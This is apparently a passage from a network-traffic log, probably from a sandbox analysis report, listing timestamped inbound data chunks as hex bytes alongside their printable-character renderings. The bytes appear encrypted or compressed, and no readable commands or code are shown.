2021-12-14 12:42:36 UTC	79	IN	Data Raw: 91 3b b3 f0 3c b0 d5 ad 72 77 9c d6 2c 0c 73 5b 8d 6f 8b 9a c9 b9 eb 20 f4 22 13 4b 20 25 ab 73 5e 46 0b 13 2c 0c e6 15 41 75 46 8f 47 b0 51 2a 26 b3 54 04 98 90 1c 5e 6e 12 c5 5d 27 45 21 6e 9b 6c 3f 5b e1 7c cd a0 44 8f 64 63 3f 3c fd d6 b4 df e8 66 63 b7 43 6e 36 de b7 71 48 23 d9 f6 02 2d 74 21 0c f7 83 d5 f9 67 6e e6 c4 a1 52 87 5e 2c 5d ec e8 05 84 aa 53 71 e9 2f 1c ae 2b 00 ca 75 7c c3 c1 c7 75 45 42 5e 57 27 35 87 ef c7 23 e3 ef e0 36 12 31 51 9b d4 9b fe ea 8d 8c 07 f0 73 fc 4f e9 6f 27 ed 88 5e 14 98 21 03 99 a1 71 c7 ba 9e 89 7d 5b 07 47 c5 22 9a e3 5d 0a 40 51 5e 46 d6 28 bb e2 15 d1 f8 fa 6e 28 28 06 c7 85 f7 e7 e4 4d ff 4d ed 74 cd 5d ce c7 2e cd 71 06 20 c0 47 8b 58 e1 e1 b0 71 5d d2 a2 cb 7a c8 fe aa 7b 0c 4f fc c8 c2 22 67 49 44 54 c9 3c Data Ascii: ;<rw,s[o "K %s^F,AuFGQ*&T^n]'E!nl?[\|Ddc?<fcCn6qH#-t!gnR^,]Sq/+u\|uEB^W'5#61QsOo'^!q}[G"]@Q^F(n((MMt].q GXq]z{O"gIDT<
2021-12-14 12:42:36 UTC	80	IN	Data Raw: c7 04 28 a2 e1 97 0d 0d 9c 4b b5 31 b6 87 43 dd 94 50 80 77 19 1a 99 b8 e7 00 ea e8 a8 b3 77 24 98 a3 a9 28 1c ef 14 3e aa c0 50 49 65 69 19 00 af ea 20 da 05 03 ee 6c 1b 43 26 03 85 6e 1d 24 8b 45 44 03 83 47 c1 f3 05 fd 60 50 af 75 36 4f 6a aa a2 1b 51 44 38 2f c7 a9 51 71 de 17 19 bb 4f 7e 44 a4 33 0f 68 21 25 d5 77 58 30 40 ab 08 e3 e8 78 81 1c 2a a2 50 07 cf 21 1e b2 4a f8 8b 71 12 49 f7 ea a7 31 8c 0d 00 27 27 0f 7a d0 b0 14 38 81 53 f1 bb 78 c8 3c ed 61 cf 05 2b 1a fe f9 9b 82 16 c1 98 6a d0 76 3a fe 66 b6 75 e2 b6 b9 dc 34 94 a8 6b f1 a2 75 d6 d7 87 be d2 2e 3b ad 4f 94 8f c6 c0 5b cf 1a 22 3c 4a 6a 01 b3 49 58 9e 53 46 60 9c a8 5e b4 1f da a6 c6 a1 b8 5a 75 d5 a7 a6 86 7b e5 43 e7 25 b9 77 b8 02 ef e5 96 91 45 7f 39 cb c0 86 e6 a8 6d 8e dd 05 91 Data Ascii: (K1CPww$(>PIei lC&n$EDG`Pu6OjQD8/QqO~D3h!%wX0@x*P!JqI1''z8Sx<a+jv:fu4ku.;O["<JjIXSF`^Zu{C%wE9m
2021-12-14 12:42:36 UTC	81	IN	Data Raw: 9a b4 b3 58 be cd 59 82 2f 6e 3d 26 1a e3 09 ee 4d ac 32 b2 05 3d 9b ca 20 c9 5b 9e cb 2a 16 67 48 73 7f ac 8f 1c ba ec c0 ee 4a 62 4b 31 2a 9e 4b a2 44 0f 12 3d 0b c4 d2 3f 75 40 e4 47 b2 51 3f 09 bf 47 7c 98 81 17 42 90 13 e9 4e 1e 57 09 db 95 6f 14 78 bd 42 c8 aa 51 fa 5f 72 34 36 96 df d8 81 17 67 49 d4 09 7e 31 b7 a2 73 60 6b c3 e6 17 49 5c 32 07 e7 12 ef d4 6d 1b c6 a9 e3 55 94 5f 34 66 d8 ed 14 89 dd 85 72 c5 2f 71 d5 bf 00 cc 7d 1f 98 d3 cc 73 57 61 03 ac 26 1f ee c1 d6 2a f7 93 be 37 03 3c 45 0a 97 b6 fd fb 9d af 46 e4 78 e5 32 3f 6c 0b e5 cc 0c 2d bf d9 d6 78 bb 6b c5 a9 86 8c 7d 12 0f 47 c5 98 8c e8 67 07 4c 7d 78 b8 df 13 47 fb 32 d3 e7 e0 90 21 1c fa d1 a2 f8 e2 82 15 fe 61 eb 49 e7 e4 2c c5 5f bd 68 0a 24 e2 73 77 5a b0 98 a7 7d 59 f0 bb 35 Data Ascii: XY/n=&M2= [gHsJbK1KD=?u@GQ?G\|BNWoxBQ_r46gI~1s`kI\2mU_4fr/q}sWa&*7<EFx2?l-xk}GgL}xG2!aI,_h$swZ}Y5
2021-12-14 12:42:36 UTC	82	IN	Data Raw: 5d 77 0b e1 fe 63 9f 6b f2 c3 9a 6f 89 2e 58 3e e5 27 9a 38 2f 27 86 7a 83 f3 c9 b5 c2 29 a4 ca e5 a3 4e 21 99 41 2c 01 4a a2 92 f5 a8 32 09 e7 75 ac 88 b2 b5 1d 04 a0 ac c6 22 a0 3e f4 51 72 d6 5b 06 b2 da a4 6a 49 fe 56 8e a5 96 73 21 fa 9b a1 b5 ab 25 0e 68 56 c3 17 75 a4 b2 71 f8 83 94 0d 5c db 0d 58 cf b3 2b 87 c6 e8 f6 8d 37 24 9b 52 10 bb b5 a8 a4 86 ba d3 c9 8a eb 6f 7f 56 cd 7a cb 2b 6e 22 b2 42 64 f1 fb b2 a2 9b 3d a9 fe 54 c5 25 6e 3d 26 0f 32 b5 e7 4d bd 3a b8 fc 4f 0b c3 53 79 50 8f c6 34 1d 62 50 63 7f b6 f7 2b bb c0 c9 e5 4b 42 55 31 30 90 55 33 a4 22 02 26 1f e7 6f 29 7e 6e bd 6f b0 5b 56 da b0 54 7d 89 80 0b 88 7d 02 d4 4f 1e 40 13 b2 e2 d3 12 50 c3 4f de a7 2d cb 40 61 35 21 5d c7 d4 9d e5 5e 8a d8 00 6f 31 c9 b9 1d 54 63 dc fc 2c ff 58 Data Ascii: ]wcko.X>'8/'z)N!A,J2u">Qr[jIVs!%hVuq\X+7$RoVz+n"Bd=T%n=&2M:OSyP4bPc+KBU10U3"&o)~no[VT}}O@PO-@a5!]^o1Tc,X
2021-12-14 12:42:36 UTC	83	IN	Data Raw: 92 b9 bf 68 56 b4 87 24 69 7b e2 8b 4d 94 79 43 b8 59 7b 0e 93 61 3d 06 af 5b 80 49 4c 65 d0 1f dc 41 57 ab e4 d1 9f a0 27 80 c7 b6 d9 08 29 63 c0 93 24 9c 97 1b 34 09 93 59 c5 38 c0 3e e0 cc 3f 83 3e 90 41 11 54 81 89 0f 06 fb f3 2b 33 22 5b bd 56 40 d6 01 07 9c 24 60 88 b6 3c 15 b9 b4 d7 d7 16 c1 e7 70 24 57 43 f3 4c fc f1 bc 28 bd 21 6f af 6d 51 df 6f 09 a5 a2 d8 77 73 38 97 50 a7 30 ba 56 21 ac ee 1f 8c 23 96 02 50 48 17 b7 de a1 75 dc 4f a3 1f 59 4b dd 62 89 e5 66 2f 91 e8 a3 02 a9 e4 ab 46 d1 d3 0c 93 c9 9e 45 2d cd 05 0a 6f 4f e7 00 ea 67 9e aa 78 8b bf 3f af 84 0c cf e3 28 b9 c9 f4 ad 7a 78 06 67 22 e5 25 36 24 ae e3 68 18 05 ac 23 96 77 80 31 90 4a 77 ed 83 56 c8 71 fd e3 59 40 0c 71 21 c3 c9 ac bd 0c 58 7f 55 28 d8 b4 48 63 de 17 19 36 4c 77 5e Data Ascii: hV$i{MyCY{a=[ILeAW')c$4Y8>?>AT+3"[V@$`<p$WCL(!omQows8P0V!#PHuOYKbf/FE-oOgx?(zxg"%6$h#w1JwVqY@q!XU(Hc6Lw^
2021-12-14 12:42:36 UTC	85	IN	Data Raw: e5 cf 10 dc 62 88 b1 c3 08 0e 10 d3 9c f0 43 fe 93 a3 77 01 9c 2e 79 fd 68 3b dd 2a 60 89 3f 36 01 2a d9 9b 14 51 44 f0 a9 90 f7 cd d7 f8 3c 5a c1 d1 ca 25 0d 9f 41 37 2d 17 5e 93 d3 ae 70 22 81 41 ae 97 89 8e 27 06 b1 a9 d3 7e 4d 3b d8 74 74 c3 d6 39 9c d9 b9 66 41 94 34 b5 bc 68 78 25 b8 b2 a3 94 31 20 3c b0 3e b7 16 75 45 98 31 fa 2c 9e 25 0c db 73 c1 d7 dc a5 90 ee c0 71 9e 37 2d f3 61 1c c5 37 a7 bb cb 52 fa cb bd e9 67 78 6f d5 3e 40 2e 10 b7 c1 7c 6c e7 d9 e2 e0 99 37 b5 e5 1c ef 0b 66 3f 5b c2 ef 1a e1 3e f9 3b ab f1 14 f0 c1 53 79 73 d6 c3 27 06 1b c6 72 6e a1 87 aa a8 cf c3 e7 56 76 5d de 20 ad 50 5e 43 a7 13 24 24 b6 68 3b 7f 29 09 6c b0 57 2a 13 af 43 64 97 90 0d 51 71 02 3b 5e 23 47 23 68 15 7e 1a 78 93 42 c8 aa 2d 7e 43 61 39 25 80 cb d6 9d Data Ascii: bCw.yh;`?6QD<Z%A7-^p"A'~M;tt9fA4hx%1 <>uE1,%sq7-a7Rgxo>@.\|l7f?[>;Sys'rnVv] P^C$$h;)lW*CdQq;^#G#h~xB-~Ca9%
2021-12-14 12:42:36 UTC	86	IN	Data Raw: 42 ff 13 f0 e8 03 31 1f 91 e7 ac 86 e9 e5 b4 27 ba d2 d1 1c 68 47 bf b4 f8 6a 54 a9 25 4e e7 43 6b b8 53 62 77 d0 5d 3f 93 a5 73 c0 f9 4c 6f e9 48 d3 79 20 b3 8b 55 9e a9 3a 0d f8 98 c5 00 2c e7 c2 93 2a b3 45 39 b4 03 bb 12 98 18 4a 35 fa df 0b e0 2f 9f 5e 37 80 9c a8 06 37 7f f3 d5 e0 30 7a ac 22 86 c7 0e 1c 23 6d 50 ad ff 33 6e 79 ae 29 d2 32 c9 e0 a5 b5 aa 4f f8 65 94 e3 bf 53 71 23 14 6d e3 e6 cc b3 4b 2f b6 f2 66 6f 3d ed 76 5b 31 9c 7a 77 84 f4 18 85 3c 17 8f 6e 66 15 a5 fb e1 7e ca bb 8a 72 59 5c da 6b 97 6f 2f 41 ab eb 88 0d ec 49 54 b9 2a cb 29 56 cd 99 5c 13 6e 3f ea b8 49 c6 02 91 bc ae ac 7c 48 80 3d af 3d 14 a5 81 01 a8 c0 c6 67 3f 7a 06 6d 25 ac b7 33 da 7d f1 56 08 d0 20 0d 99 68 bb dc 95 7d 13 e6 f8 8e c1 6f 07 ea 64 74 cb fa 1d 4f f6 ae Data Ascii: B1'hGjT%NCkSbw]?sLoHy U:,E9J5/^770z"#mP3ny)2OeSq#mK/fo=v[1zw<nf~rY\ko/AIT)V\n?I\|H==g?zm%3}V h}odtO
2021-12-14 12:42:36 UTC	87	IN	Data Raw: 83 de ad 3c 8f 27 bd f8 f3 43 08 32 1f 53 34 87 22 1b 18 af c1 4b 91 96 82 1b 01 05 ff 78 67 d8 8d 87 d9 bf 0b e1 fc 0a c3 6e 24 e9 47 2d 8b 2e 33 36 5f 25 9a 32 66 75 35 7e b6 e4 c6 a4 d7 31 4c 35 c8 8c 55 25 8e 4e 3d 14 5d 43 de 27 b9 1c 1d a3 44 96 13 4b 62 d7 2c a0 a6 d7 0b b4 3a 85 47 76 c0 13 07 9e c8 b1 02 8b fe 47 8e bd ec e3 12 f5 f0 e7 98 20 2c 26 6b 3e cd 16 75 45 a9 1b 8b 13 96 0d 47 f1 33 c9 cf b9 09 d0 ec c6 fc 95 52 b6 b4 72 15 b6 18 aa a4 86 d2 b9 e5 8a e1 4d 2a 67 cf 5b 48 cf 10 b1 b3 4e 78 ea d1 e7 69 9b 37 bb e1 1a ef 70 a7 3d 20 01 61 ad e8 4f bf 42 60 fb 3c b3 b7 d2 73 5b 9f c3 5c c7 74 43 77 e0 10 14 dd bb c0 c2 fe 71 5a 4a 20 2b a9 1f 5c 45 29 15 fa 81 c6 68 3b 77 6e c1 6f b0 5b 4d 35 b0 54 6c e5 5b 1c 5e 6a 39 d6 5d 07 7a 7b 6e 91 Data Ascii: <'C2S4"Kxgn$G-.36_%2fu5~1L5U%N=]C'DKb,:GvG ,&k>uEG3RrM*g[HNxi7p= aOB`<s[\tCwqZJ +\E)h;wno[M5Tl[^j9]z{n
2021-12-14 12:42:36 UTC	88	IN	Data Raw: 1d ce a8 7f 23 3c c2 ca ca 28 76 50 21 60 e0 27 32 79 bd 6a 36 e2 12 31 6f 51 74 b7 cc a1 a0 b6 27 af b8 83 11 68 5c a1 a8 17 66 f7 b6 27 4d 96 06 a4 b8 59 7f aa cc 74 3c 93 a5 f9 b8 d1 4d 65 c1 0b aa b1 2a ab e0 a2 a1 ab 3c 74 df f0 b6 35 50 a5 ca bb 65 99 06 31 a2 49 9e 58 9a 18 42 45 2b cc 04 e4 37 81 47 c0 f1 b7 84 0f 0d 98 dd 2a 1f 2b 49 b2 05 c0 d4 01 09 10 e8 97 81 af 35 12 c3 90 2b d6 30 c9 ec 00 05 83 4f f2 4f fc f4 be 59 6a 25 1c ef e1 e6 c2 9d 78 13 b4 f8 44 3f 3a 9e 43 48 34 87 5f b8 af f4 12 8e 51 4c fc 51 60 a2 c0 c5 a0 7c c0 13 9a 9c 5b 5c d0 60 fb 32 98 2e b9 e3 99 01 47 15 7e b9 2e d6 60 95 c2 99 49 0d 7c 2e 53 b8 65 ed 02 91 b2 ae ac 7c 3c cd 01 ad 37 06 de fa 4d 95 c2 cc 45 52 38 04 67 39 fd 3b bb 61 80 ee 66 33 9f 22 1c 9c 5f c0 20 94 Data Ascii: #<(vP!`'2yj61oQt'h\f'MYt<Me<t5Pe1IXBE+7G+I5+0OOYj%xD?:CH4_QLQ`\|[\`2.G~.`I\|.Se\|<7MER8g9;af3"_
2021-12-14 12:42:36 UTC	90	IN	Data Raw: ce b7 65 4f 6e 33 41 d0 15 f5 b7 4a 13 79 0b b6 69 92 d1 9d 47 fc 18 b5 5a e8 61 5e 39 0e 50 36 d3 92 62 c8 50 de 63 91 92 93 01 18 0c 46 97 6d e3 86 19 b3 7c 23 42 f8 79 f7 7d 2f f4 a9 43 82 3f 30 09 80 0f 8b 38 70 4c 98 64 b8 e6 c9 a4 cc 9c 5c da cd 3a 42 1a 50 45 3d 03 45 d1 94 d9 b8 31 0c 82 50 a4 9e 90 53 2c 06 a6 04 dd 31 a7 2e e0 68 d5 c0 a5 0d 88 55 8c 79 4d ff 51 a2 4f 69 72 07 d4 b2 88 db 22 2e 5f a4 4d f3 10 01 ce b0 71 f9 3d 90 1a 9b 54 66 cb cf b2 09 db ec c6 fc f9 1c 32 b5 69 6e 09 26 a8 a0 8e d7 37 e7 8a ef 74 6d 63 de 55 5e 07 8c b1 b2 48 cc f6 d7 8b 74 88 33 ae c9 4e e5 35 21 c3 df fa ed 18 9e 84 bd 39 af fc b3 9c c3 53 71 20 4b c1 27 08 63 29 a9 6c dc 5f e2 bb c4 ad 2e e3 06 cd 21 21 87 6f 4f 75 21 02 06 0c ec 68 3d 75 46 9a 7b bb 7a 22 Data Ascii: eOn3AJyiGZa^9P6bPcFm\|#By}/C?08pLd\:BPE=E1PS,1.hUyMQOir"._Mq=Tf2in&7tmcU^Ht3N5!9Sq K'c)l_.!!oOu!h=uF{z"
2021-12-14 12:42:36 UTC	91	IN	Data Raw: b7 71 0c aa 5d 73 b2 34 9d 9a b0 60 5d 97 13 ca 7a d1 dd ba 6d 37 5e c4 9b cb 22 67 49 40 4e f3 bd 2b 5d ec 6c 27 e4 6c 85 1d 15 7c a4 cc 9d f3 bf 20 ad 81 ce 3b 4c 56 b0 a7 10 4b 61 9f 25 4d 86 76 41 2c 58 7b 1b b0 6b 1d 92 ae 5b 80 76 67 65 c1 08 c2 74 0a aa e5 d1 9f 24 17 7e c6 9b d6 0d 43 ae e8 2c 22 9b 00 2d a2 1a 80 4b 89 09 4d 1e e0 cd 04 e0 2d 84 53 02 56 0b 85 0f 09 f0 04 3b 14 07 89 bb 2d 80 c0 17 10 06 81 45 90 a8 11 15 b1 ae 29 c5 29 ca f7 5b ac 80 4f fe 74 b5 85 9c 51 7b 27 7c a3 f2 ee d9 b9 57 39 b6 f2 6a 68 2b 9b 5f 48 3c 18 e5 20 5c e7 07 9f 24 aa e8 40 69 04 a1 42 b7 52 d8 a0 a7 24 8d 4f d5 73 8e ee 4e 3d b3 fb 86 16 84 ab b2 a8 23 a0 9a 45 c2 98 5c 19 66 dc 03 6f e8 cc 00 ea 75 86 e6 7a 3b b4 4b bd 37 0c d4 e1 33 bb c8 e4 08 7b 78 0c 76 Data Ascii: q]s4`]zm7^"gI@N+]l'l\| ;LVKa%MvA,X{k[vget$~C,"-KM-SV;-E))[OtQ{'\|W9jh+_H< \$@iBR$OsN=#E\fouz;K73{xv
2021-12-14 12:42:36 UTC	92	IN	Data Raw: b0 bf 74 d5 ad 49 d6 66 cf 69 4b 2c 93 77 24 17 c0 c8 b6 07 45 7f 39 e8 c6 99 db a1 47 11 df 0e aa 6c 80 c2 9d 3f fc 18 b9 eb fd 7a 49 26 e1 5a 28 c1 a6 f8 cf 83 da 62 84 88 86 86 75 1a da 87 4e ef 90 85 a8 04 5d e3 f8 73 87 65 33 39 2e b9 04 05 39 1e 1b 34 9f 3b 74 57 8e 70 95 79 7e b6 c5 28 72 a2 c9 a0 50 21 99 50 39 13 ac 5f 98 de 94 27 37 5b 45 ae 8e a9 99 a4 7d a0 a6 cd 13 a8 3b f4 4a 05 96 a7 07 94 a3 a2 7c 67 fe 47 8a ad 58 77 0d 43 b1 a3 9e e0 2c 24 79 5b e0 1e 4d e3 b1 71 f8 2c 85 07 52 cf 8d ca e3 b9 30 99 f9 10 e5 85 22 25 a6 78 13 d4 2c bf 5a 8d 80 f8 ff 99 e1 65 78 6f d2 af c5 03 1a a0 b6 78 b7 e7 d3 9c bc 88 3d bf dc 55 f2 1a 92 3c 0c 0e fe 13 f4 45 27 2a ae e4 2e a4 c9 53 62 51 82 3f 26 20 7e 52 74 7f a1 02 f1 bf dd d0 fc 59 78 41 3f 31 7f Data Ascii: tIfiK,w$E9Gl?zI&Z(buN]se39.94;tWpy~(rP!P9_'7[E};J\|gGXwC,$y[Mq,R0"%x,Zexox=U<E'*.SbQ?& ~RtYxA?1
2021-12-14 12:42:36 UTC	93	IN	Data Raw: 04 22 d0 92 b5 e0 ee a9 fe 61 ee 44 ff 7f 2d 47 57 b6 71 c0 24 ea 74 9d 48 9a 8d a3 76 4d f3 b4 d8 7e cf c2 be 71 30 5c f9 dc c7 21 75 59 40 5b f0 25 2a 51 ef 6d 24 eb 2b 99 1d 15 70 8e c1 8b e0 b4 0f 15 91 c2 15 7b 50 a1 ab 04 10 a1 9f 27 49 96 06 b5 b8 59 7f 0b 39 19 e2 93 af 5f ef 65 4d 65 c7 0b aa a5 2a ab e0 c7 05 d2 dc 7e c6 9e aa 62 50 a5 ca 4d 68 be 2e 0c b4 09 99 4a 92 1b 51 36 c8 a3 04 e0 38 b8 94 12 7e 9b ac a0 0e e3 0b 0c 09 3c 5f 97 15 86 d6 0b dd 31 b6 79 b6 af 31 1f a3 a7 2a f6 3b d8 e4 f3 12 54 4b f8 61 94 59 bf 53 7d 07 79 b8 e4 ce f0 b5 38 1b 6a f2 7d 79 01 18 48 59 31 80 50 4c 5a f4 12 88 a4 36 eb 8b 73 cf bc dc b2 77 f2 7e a2 33 5b 5e ab be 80 f9 9c 3f b6 70 9b 0a 93 e1 88 b9 2e d0 0a 4e d5 4f d7 0f 7d 04 6f 64 65 e7 04 c6 3a bf aa 69 Data Ascii: "aD-GWq$tHvM~q0\!uY@[%Qm$+p{P'IY9_eMe~bPMh.JQ68~<_1y1*;TKaYS}y8j}yHY1PLZ6sw~3[^?p.NO}ode:i
2021-12-14 12:42:36 UTC	95	IN	Data Raw: af de 4b 58 08 73 48 43 a3 06 31 4d 1e 46 aa ff 99 93 b5 71 cd 3d 55 ec 66 cf 69 17 32 bf 18 13 06 f0 c4 a1 ac 56 66 2a 59 fe 38 ca b7 4a 14 ca 14 d3 4a 81 d4 bf 49 c6 77 54 f9 f9 61 5e 3c 0e 55 37 fc 08 ef e7 50 d8 73 8c f6 b6 08 0e 10 cc 97 6a 9b 7e 85 a2 7d 64 8b fa 79 f7 7f 29 f2 34 47 35 2c 39 18 01 48 f1 3a 70 4c a7 57 96 e6 c7 cb f2 3c 5a c1 d8 ac 41 e4 f2 49 3c 05 58 33 f9 db b8 3a 13 99 4a 86 a6 bb 9d 2e 69 cc a4 cc 31 95 2b ff 46 67 ce ca 33 9c d9 b9 16 21 fc 47 80 98 43 54 1c f5 98 d2 9e 20 2a 09 75 5c f8 3c 5b 4c b0 77 97 40 96 0d 47 ff 62 c0 c9 a2 2f fe da c4 f6 87 52 5e b7 72 19 e3 37 a6 b3 5a bf f5 f6 84 fa 7c 57 33 30 ae 3b 27 3d 81 a3 49 46 3c d7 9c a4 f4 5b bd cd 55 cb 1a 67 2c 2a 11 c7 a6 e7 4d bb 2f 26 fc 3c b7 c2 47 67 4f b6 62 27 0c Data Ascii: KXsHC1MFq=Ufi2VfY8JJIwTa^<U7Psj~}dy)4G5,9H:pLW<ZAI<X3:J.i1+Fg3!GCT u\<[Lw@Gb/R^r7Z\|W30;'=IF<[Ug,*M/&<GgOb'
2021-12-14 12:42:36 UTC	96	IN	Data Raw: 16 77 3d 42 7d 4b 93 34 1c ae e6 6d a3 fd ec 9a 03 76 06 ab 50 f7 e0 f8 9f ff 4b ed 48 b2 a8 2d c5 51 b4 0a dd 24 ea 61 e6 a0 9c 9a ba 5b 59 eb 92 c9 7a 9d ce a8 7b 24 4f fc c8 c8 0a 70 58 52 55 e0 31 45 b0 fd 68 32 eb 2b ba 1d 15 7c 9b cd a1 ce b6 27 a3 e3 e4 11 68 5c ca a9 10 59 70 9b 07 b2 6b 7d 69 89 52 53 33 a1 62 3b e0 f8 5a 80 f1 36 67 c2 74 0e 79 2a af e6 d5 e2 49 3c 7e c2 b0 c5 0a 41 95 c3 93 65 9b 06 3b b4 09 93 59 98 1b 44 16 52 cd 04 e6 3b b8 ce 17 7e 97 a8 04 27 cd 0f 2a 19 5c 7e bd 2d 8c ac 0f 07 3a 1c 50 81 a5 1d 1e 98 80 2b d6 3c ab c2 71 3a 8b 35 fa 70 c1 17 be 53 7f 23 6a a5 e7 ce b0 b5 38 17 c9 10 6c 7e 3c b4 49 59 31 85 62 33 86 3e 12 8c 2a 81 fc 51 64 17 87 c4 a1 7c c0 b3 b4 4e b7 5c d0 66 82 ef e5 c3 bd ea 8c 05 92 e7 b1 b9 2e d0 19 Data Ascii: w=B}K4mvPKH-Q$a[Yz{$OpXRU1Eh2+\|'h\Ypk}iRS3b;Z6gtyI<~Ae;YDR;~'\~-:P+<q:5pS#j8l~<IY1b3>*Qd\|N\f.
2021-12-14 12:42:36 UTC	97	IN	Data Raw: 33 d1 2b e0 b3 25 02 8f de 9b af c2 86 20 38 7e 4f c0 a2 4c 46 fc 54 75 5f bb 03 a0 b3 a9 47 a0 df fb e3 a6 75 df d4 46 82 64 c5 6e 2e 2c aa 72 24 15 f5 d6 48 77 69 74 3b 54 b5 2d cb b7 4c 18 c2 09 b9 7e 92 d1 a2 a8 fd 34 bc e0 ea 6e 4d 21 1a 40 dc c6 a6 e4 e4 52 ad d6 83 99 84 01 14 09 df 86 77 f1 8c 7b a3 5b 02 e9 97 04 ff 6c 2e fd 2a 6a 89 3f 3c 01 13 d9 9b 14 7a 4f e4 1c 92 f7 c3 bb cc 2d 5f cb d8 a5 4a cc 9c 6d 2b 03 77 a2 94 6f b9 30 19 fb 3a ac 88 b2 ee 54 04 a0 ac c0 26 a0 3f f4 51 73 db 5b 06 b2 d3 b4 7f 30 15 47 8a ba 74 61 08 f8 a1 a6 88 de 2d 08 6b 5a e0 11 75 5e b5 6e f2 d2 95 21 4f f2 76 f3 e0 4c de 6e c4 d8 f4 96 0d 30 b5 49 13 c5 26 65 a4 8c bd ef ec 9e e1 66 6f 11 58 51 c4 2e 03 b5 a0 46 46 aa d2 9c a8 8a 33 b5 e1 58 eb 7f fb 3d 20 04 c5 Data Ascii: 3+% 8~OLFTu_GuFdn.,r$Hwit;T-L~4nM!@Rw{[l.*j?<zO-_Jm+wo0:T&?Qs[0Gta-kZu^n!OvLn0I&efoXQ.FF3X=
2021-12-14 12:42:36 UTC	98	IN	Data Raw: ed 13 ca 32 8f ee 65 04 d6 de 1d ba 75 aa 27 ac 3b 9b 1b 7c 4f eb 6f 10 d2 77 70 b1 75 36 4f 26 ac bd 1c 58 5b 9c b7 d8 be 71 d4 d6 0b e7 26 65 68 5b 87 fe 00 69 21 bd ce 64 41 27 22 c9 0f d0 f6 73 0f 00 26 a2 c4 1e d9 c4 00 d1 dc f9 90 10 1e 47 6b e8 a7 26 9f 4c 94 38 c6 10 49 cf 2f 3a a8 9f 73 16 97 b3 d2 ac eb 76 f5 e4 51 aa f5 e1 c4 0e 02 5d 94 08 fd 57 b6 fa 7d ba e9 ec b7 64 fd fd 9e af 73 10 b6 6b f2 cc d3 2b d8 31 16 aa f7 09 a5 d1 95 ff c3 86 22 28 74 46 c0 bb 54 a6 03 79 50 4f be 5b 50 b5 1f 42 be d5 88 90 b3 8b d4 8b 38 98 68 cf 6b 27 db b8 5b 26 13 fc ce be 69 4f 81 38 7b c4 b2 cf 8f 17 ed 24 e5 bb 54 90 e4 b6 56 5d 18 bf f8 28 6b 4d 21 09 4a 26 ff 18 ef e7 50 de 73 86 82 7c 0b 22 1f c3 8c 7a e7 95 85 b3 73 16 1f f9 55 f1 64 27 f5 11 ac 88 2e Data Ascii: 2eu';\|Oowpu6O&X[q&eh[i!dA'"s&Gk&L8I/:svQ]W}dsk+1"(tFTyPO[PB8hk'[&iO8{$TV](kM!J&Ps\|"zsUd'.
2021-12-14 12:42:36 UTC	99	IN	Data Raw: 5d 45 27 8c 9b b4 3b 06 be 73 28 0e 02 63 50 39 10 af 44 64 9d 90 0d 5b 71 06 3b 5e 23 5d 23 15 9f 6e 12 54 a6 b5 c8 a0 48 e3 57 72 3a 36 96 d1 dd 70 e8 4a 60 ce 0b 74 25 dd b5 63 65 7d 22 f7 28 5f 5e 58 02 fc ec ea fa 1c 78 e5 ab e7 45 85 23 3f 74 d3 e9 8b 35 aa d2 73 e9 2f 6e ee 2f 00 dd 72 0c 90 3e c6 5f 56 68 19 3c a2 35 86 42 aa f0 e8 80 b3 28 00 24 56 f4 87 9f e1 e7 70 a5 6a e0 74 f8 5b cf 6c 27 e3 88 8f 17 98 2d 20 5d 0a 96 ce a5 ba 9a 78 5b 1e 42 dd cd 8d c4 7a 13 3b 44 48 b8 d3 13 97 a8 07 c2 fa ec 81 2c 1a fa d1 a2 f1 cb e0 ac f7 72 ea 5f de 73 32 d5 ab b7 5d 00 0f dc 7a 98 48 99 9a a1 74 46 f5 5c ca 56 d7 c6 b9 7f 1a e5 02 37 35 3d 69 4b 57 5f f3 22 27 47 03 69 1a e3 01 21 61 1b 77 b7 c2 96 f7 a7 22 a5 81 c7 0c 7a a8 b1 81 0a 69 03 91 26 4d 90 Data Ascii: ]E';s(cP9Dd[q;^#]#nTHWr:6pJ`t%ce}"(_^XxE#?t5s/n/r>_Vh<5B($Vpjt[l'- ]x[Bz;DH,r_s2]zHtF\V75=iKW_"'Gi!aw"zi&M
2021-12-14 12:42:36 UTC	101	IN	Data Raw: b4 88 c0 6c 0c cf f8 2d af c4 ca 59 6b 7d 69 ce 33 ec 35 cf 34 87 56 02 c1 d4 27 0a fc 47 54 26 fb a6 64 e4 89 44 ba 76 02 e2 71 6e 2e 73 3f 20 5c ac bd 07 59 7d a4 32 e8 bd 71 fb de 17 19 fc 49 61 4d f7 0f 0f 68 2b b5 d1 6b 49 40 f2 36 0e fa de 54 6b 14 45 d7 cc 01 da 6b 16 f6 08 ef 90 79 5c 50 60 32 b2 24 bf 4a 94 4e 6f 11 65 cf f0 15 0d 9e 72 0c bb 78 ca a0 ed 7e f2 39 50 8c f8 e6 ba 9d 19 6d 9b 75 f5 57 b6 fe ba b6 e9 f5 ab ca 87 df 95 a8 6f 18 98 6a f2 c9 e1 29 fc 1f 1c b2 0f 7b 0a db e6 4e b8 84 74 4c a4 4b c0 b5 43 70 91 57 59 42 b1 0e cd b6 1f 4c ac d0 f6 0b a4 75 df 8f fa 81 64 c9 70 35 23 d6 e3 26 04 fa dd b0 5d 78 6d 3f 7f 53 9b ca bd 59 17 d8 0b b9 11 15 d6 b5 5c d1 32 bd a8 e8 6e 45 5f d5 58 22 c1 a6 f1 f6 54 cf 67 f9 80 83 0a 0a 12 cb 83 1d Data Ascii: l-Yk}i354V'GT&dDvqn.s? \Y}2qIaMh+kI@6TkEky\P`2$JNoerx~9PmuWoj){NtLKCpWYBLudp5#&]xm?SY\2nE_X"Tg
2021-12-14 12:42:36 UTC	102	IN	Data Raw: be 8c 91 8d 98 e2 bb d3 f3 f2 59 dc 48 20 21 5e 45 5c 54 35 11 2a 34 4b 6b 3b 75 46 9a 6b af 4d c7 17 9c 40 75 e3 9e 1d 5e 6a 15 d3 58 81 e5 4e c7 91 6f 18 4f d4 51 ce a0 53 fa 5d 76 c1 37 ab c3 c5 f5 e7 67 65 dc 16 47 af da b5 78 76 79 b3 5f 04 42 56 3c 14 ee ea ee e9 61 77 fe 55 e2 7f 9c 5a 54 7b d2 ed 01 a2 c5 fa 73 e9 0d ea ff 2a 0a da 6f 7c 28 c0 c7 79 59 71 0d 54 27 22 ee d0 3b 22 c5 83 ad 24 14 37 42 f2 89 95 00 ed a2 b8 44 8e 7d fb 20 c5 6e 5c fe e6 09 11 b0 be 2b 87 b8 57 dd d5 1f 89 7d 51 10 57 d6 35 8c f9 70 0e 49 a8 48 94 9f 06 c2 f4 1f d1 fb f2 1d 02 04 04 d1 9d f2 f1 f9 a5 e1 31 73 4e ca 61 32 8e c9 a7 74 1e 